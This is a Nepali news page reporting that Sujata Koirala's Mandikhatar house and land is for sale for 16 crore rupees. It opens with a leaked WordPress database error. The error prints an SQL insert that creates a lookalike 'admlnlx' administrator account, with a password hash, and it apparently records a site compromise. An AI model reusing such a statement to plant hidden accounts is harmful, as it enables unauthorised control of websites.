WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BY3/GHa1tJ3IKxDfvPIbu4YESx5ebX0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 07:47:20', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस १३ –
यदि तपाईंसँग एकमुष्ट १६ करोड रुपैयाँ छ भने सोझै मण्डिखाटार पुग्नुस् । ०४६ को परिवर्तनपछि सबैभन्दा लामो समय देशको शासनसत्ता सम्हालेका नेताले अन्तिम रात बिताएको घर, जमिन सबै आफ्नो नाममा पार्न सक्नुहुन्छ ।
स्तानको उपचारका लागि नेपाल सरकारले ५० लाख रुपैयाँ निकासा गरेपछि अत्याधिक आलोचित बनेकी थिइन्, काँग्रेस नेतृ सुजाता कोइराला । अहिले पूर्वप्रधानमन्त्री गिरिजाप्रसाद कोइरालाले गंगालाल हस्पिटल जानुअघि केही पल गुजारेको मण्डिखाटारस्थित उनको घरजग्गा बिक्रीमा छ ।
हिजोआज चाबहिल मालपोततिर लेखापढी गर्नेदेखि त्यस क्षेत्रमा केन्द्रित भएर जग्गाको काम गर्ने दलालहरु आकर्षको कमिशनको लोभमा सुजाताको घर–जग्गा बेचाउन जोडतोडले लागिपरेका छन् ।तर, त्यस्ता हिम्मतवाला ग्राहक अझै भेटिएका छैनन्, जसले एकैचोटि सुजातालाई १६ करोड बुझाउन सकुन् ।जनआस्था साप्ताहिकबाट